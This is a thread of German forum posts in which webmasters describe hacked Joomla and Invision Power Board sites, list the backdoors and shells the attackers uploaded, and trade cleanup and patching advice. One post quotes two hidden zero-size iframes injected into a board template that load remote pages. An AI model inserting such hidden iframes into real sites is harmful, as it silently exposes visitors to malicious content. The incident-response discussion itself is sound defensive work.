MacTV

NUR ZUR INFO ! Heute morgen wurde unser Joomla 1.0.7 gehackt. Ich habe / hatte Joomla 1.0.7 auf meinen Sytem und wie ich gesehen habe gibt es seit dem 20-04-2006 nen Joomla <=1.0.7 Denial of Service Exploit. Diese Dateien wurden alle hochgeladen ! r0nin - help.pl - help.php - botnet.txt - admin_view.php - 1.c r0nin = Backdoor Programm help.pl = ConnectBack Backdoor Shell help.php = Die berümte r57shell.php botnet.txt = ShellBOT admin_view.php = ? 1.c = Linux kernel ptrace/kmod local root exploit Soweit läuft nun wieder alles (inkl. Patch). Ich habe alles durchgecheckt und nun ist wieder alles auf dem alten Stand. - Alle Verzeichnis und Dateien Rechte eingeschränkt (644 / 755) - Alle USER-Passwörter geändert - Alle SQL Datenbanken (Forum / Joomla) geändert - FTP Passwort geändert und >>>> Email an Hoster ! und ich hoffe mal das der Server nicht ein Backdoor programm ab bekommen hat. Also PATCH 1.08 installieren !!! > www.joomlaos.de

Puh ..... wenn ich mal Zeit habe ... bin zur Zeit zuviel on Tour Dublin / Brüssel / Österreich :D

Die habe ich auch noch nie zum laufen bekommen. Ist eh ne Beta.

Wie soll man helfen wenn man nicht weiss wie es aussieht ...

ACP > Skins & Templates > Manage Skin Sets > Board Wrappers

Also das Board wurde "angehackt" und im Wapper ist was drin was da nicht rein gehört ! <iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe> <iframe src="http://traffbucks.biz/dl/adv463.php" width="0" height="0" frameborder="0"></iframe>

Warum? ich würde mal sagen über den gleichen weg wie hier auch! Jooo Danke für die Antwort ... und weiter gehen ....

Mhhhhh..... nun ist die Frage wie ?

@finger Du mußt halt alle php durchsuchen nach den neuen Einträgen. Da Häcker meistens keine Zeit haben werden immer die ersten Zeilen verändert oder hinzugefügt. TIP: Bei FTP Programm kannst Du ggf. das geänderte Datum sehen, das wären dann die Dateien die ich als erstens kontrollieren würde. Ansonsten mußt Du die Dateien nei hochladen. PS: Dein Hacker hockt übrigens in Malatya,Non US,TR 44330

Wie hart ! Kannst Du nicht einfach mit dem Zahlencode bei anmelden arbeiten. Also ich meine, wer sich anmeldet muss nen Code eingeben.

Ach .... und wie ist das bei der aktuelle Version von Coppermine Photo Gallery ? da kann ich locker 5 Fotos gleichzeitig hochladen. Des is JAVA ?

Mhhhh also Scr!pter, wenn Du schon hier nen halben Roman schreibst, dann verstehe ich aber nicht warum Du keinen 3 Zeiler an IBP senden kannst. Seltsam...

Ich weiss ja nicht ... ob ich das kann ;)

Gibts hier und im anderen Forum ...

Nun ja.... seit dem letzten Angriff vor 5 Tagen habe ich nun alle Dateien mit 644 und die Verzeichniss mit 755 bzw. das Upload Verzeichnis mit 777 geändert. Die Admin.php habe ich nun auch umbenannt, weil ich muss nun ja nicht jeden tag ins ACP.

Also ich arbeite schon seit mehreren Jahren mit der 1.3.1er Version (Mehrere Clans und diverse Webprojekte) ich bin zu frieden und fummel schon seit langen nicht mehr an der Software. (Soll heißen, ich habe alle Mods getestet und nun ist das ganze soweit ausgereift.) Ok, wir hatten am 01-02-2006 wieder mal ein Sicherheitleck, welches wir aber innerhalb eines Tages behoben hatten.

Sind auch die aktuellen Sicherheitlücken zu ? Unabhängig vom Portal ?

Okje ...

Alles OK ! <---- Selbe Meinung

Das steht Deine Forum welches erfolgreich gehackt wurde mit HASH Passwort... aber das war schon 28-02-2005 Jetzt würde ich mich mal schnell an den DAN wenden .... der hat Dir doch das Forum aufgebaut ... oder ? Also wenn geht, muss das 1.3 drauf mit allen Patches .... und das ist ein wenig Arbeit.

Ok ... dann ist das eine alte Sicherheitlücke. Ich sehe Du hast auch noch IPB 1.2 und Portal ADDON 1.1 RC2 by Dragoran. Dennoch solltest Du die aktuellen Sicherheitslücken schliessen. Und kontrollieren ob nicht noch irgendwelche Dateien geändert wurden bzw. Neue hinzugekommen sind.

und deswegen ... erstmal das Forum ausschalten ... die index.php und config.php und admin.php unbennen... Aber ruck zuck ! und dann das lesen > http://www.ibforen.de/forum/index.php?show...indpost&p=81623

Tag... so heute hatte es unser Forum 1.3.1 erwischt. Wir wurden gehackt. Ich war zum Glück gerade im Forum und konnte Schlimmeres abweisen. Also ich dachte zuerst das Forum wurde gehackt weil der letzte Patch noch nicht aufgespielt wurde. OK bei mir fehlte ein Sicherheitseintrag im der TOPIC.php Anscheind kennt jemand eine Sicherheitslücke und konnte dadurch bei mir die index.php admin.php und was noch viel schlimmer ist die config.php ändern. Ich habe meine alten Sicherung vom (15.01.2006) kontrolliert und wieder hochgeladen. Alle Dateien auf 755 gesetzt und das SQL Passwort geändert. Bei meiner Durchsicht bei den Server Logdateien kam der Hacker über diese Google Abfrage: http://www.google.it/search?q=%22Portal+1....irefox-a&rls=or g.mozilla:en-US:official&start=90&sa=N http://www.google.de/search?q=Portal+1.3+b...irefox-a&rls=or g.mozilla:de:official&start=20&sa=N http://www.google.com.sa/search?q=Portal+1...e&start=60&sa=N http://www.google.fr/search?hl=fr&q=%22Por...+business&meta= http://www.google.com/search?q=%22Portal+1...=&start=90&sa=N Also wird über das Dragoran Portal eingestiegen ! Meine Version ist die 1.2 (oh Gott) Es gibt aber anscheind schon eine Portal 1.3-2 by Dragoran > http://www.lkw-allrad.de/forum/ Selbst jetzt habe ich immer noch google Referer mit der Dragoran Portal Abfrage. Ich habe wie gesagt alle Dateien erstmal auf 755 gesetzt und das Portal ausgeklammert. Weiss jemand von dem Problem ? Kann man die Dateien nicht einfach auf 644 setzten ? PS: Das Board hat er auch gehackt > http://www.minolta-forum.de/ PS2: Das gleiche Thema habe ich auch auf > http://www.ibforen.de/forum/index.php?showtopic=11167&hl= UPDATE: Dort ist auch ein FIX Ich weiss, das es zwischen den zwei Supports knistert. Aber bei dem Problem, was bestimmt in den nächsten Tagen viele haben werden, sollte man etwas zusammen dagegen unternehmen.

Also, wenn ich mir die Web-Space-Log-Dateien der letzten 5 Tage ansehe dann hab ich pro Tag etwa 34 Hackangriffe auf unser Board. Zu einem wird versucht via Dragron Board Hack ins Board einzudringen, der Rest sind irgendwelche anderen Abfrage. (Da schätze ich auf die fehlenden Security-Hacks). Fast 80 % der IP´s stammen aus Russland... Ei ei ei ....

Da stimme ich Dir zu. Aber das Portal haben sehr viele "Old IPB Admins" sehr sehr oft im Einsatz. Von daher wäre ein Newspost auf der Startseite schon wichtig ...